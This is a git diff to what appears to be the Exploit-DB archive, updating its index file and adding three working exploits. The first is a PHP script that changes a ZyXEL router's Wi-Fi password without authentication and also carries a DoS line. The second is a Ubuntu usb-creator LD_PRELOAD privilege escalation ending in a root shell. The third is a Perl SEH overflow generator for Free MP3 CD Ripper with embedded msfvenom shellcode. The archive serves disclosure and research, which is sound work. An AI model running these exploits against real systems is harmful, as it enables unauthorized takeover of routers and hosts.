diff --git a/files.csv b/files.csv index e216bb909..dde916fb1 100755 --- a/files.csv +++ b/files.csv @@ -26594,7 +26594,7 @@ id,file,description,date,author,platform,type,port 29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0 29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0 -36816,platforms/php/webapps/36816.php,"Open-Letters Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80 +36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0 29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0 @@ -33218,5 +33218,8 @@ id,file,description,date,author,platform,type,port 36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0 36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0 36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80 -36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80 -36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0 +36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80 +36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0 +36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0 +36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80 +36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0 diff --git a/platforms/hardware/dos/36825.php b/platforms/hardware/dos/36825.php new file mode 100755 index 000000000..dc1fffb3d --- /dev/null +++ b/platforms/hardware/dos/36825.php @@ -0,0 +1,58 @@ + _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n"; +print $banner; +function Post($packet,$host) +{ + try { + $curl = curl_init(); + curl_setopt($curl, CURLOPT_URL, $host); + curl_setopt($curl, CURLOPT_POST, 1); + curl_setopt($curl, CURLOPT_POSTFIELDS, $packet); + curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"); + curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp"); + curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); + $result = curl_exec($curl); + curl_close($curl); + return $result; + }catch (Exception $e ){ + echo $e->getMessage(); + return "" ; + } +} +if(sizeof($argv) < 3) { + print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n"; + exit(1); +} +$host = $argv[1]; +$password = urlencode($argv[2]); +$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ; +$target = "http://$host/cgi-bin/WLAN_General.asp"; +if(strlen(Post($packet,$target)) > 0){ + print "Seems Changed !"; +}else{ + print "Humm , No Chance !"; +} +//DoS : Post("",$target) ; +?> \ No newline at end of file diff --git a/platforms/linux/local/36820.txt b/platforms/linux/local/36820.txt new file mode 100755 index 000000000..c78fd5e7b --- /dev/null +++ b/platforms/linux/local/36820.txt @@ -0,0 +1,23 @@ +Source: http://www.openwall.com/lists/oss-security/2015/04/22/12 +Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396 + +Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1) +Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1) +Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3) + +$ cat > test.c +void __attribute__((constructor)) init (void) +{ +chown("/tmp/test", 0, 0); +chmod("/tmp/test", 04755); +} +^D +$ gcc -shared -fPIC -o /tmp/test.so test.c +$ cp /bin/sh /tmp/test +$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so" +method return sender=:1.4364 -> dest=:1.7427 reply_serial=2 +$ ls -l /tmp/test +-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test +$ /tmp/test +# id +euid=0(root) groups=0(root) diff --git a/platforms/windows/local/36826.pl b/platforms/windows/local/36826.pl new file mode 100755 index 000000000..183afe48c --- /dev/null +++ b/platforms/windows/local/36826.pl @@ -0,0 +1,43 @@ +#!/usr/bin/env perl +# original p0c https://www.exploit-db.com/exploits/36465/ +# credit to TUNISIAN CYBER +# however he was attemping to vanilla buffer overflow +# in fact it is SEH based exploit +# using the address 0x7C9D30D7 is limit the targets +#which I assume belongs to OS file didn't work on win7 +#yes he did find a buffer overflow since the offset reaches ESP before SEH +#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH +#This p0c > win 7s & 8s +# ThreatActor at CoreRed.com +## + +my $file = "p0c.wav"; +my $buff = "A" x 4116; # offset to SEH +my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp +my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll +my $nop = "\x90" x 28; + +#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d' +my $shell = +"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" . +"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" . +"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" . +"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" . +"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" . +"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" . +"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" . +"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" . +"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" . +"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" . +"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" . +"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" . +"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" . +"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" . +"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" . +"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5"; + +open($FILE,">$file"); +print $FILE $buff.$nseh.$seh.$nop.$shell; +close($FILE); +print "+++++++++++++++++++\n"; +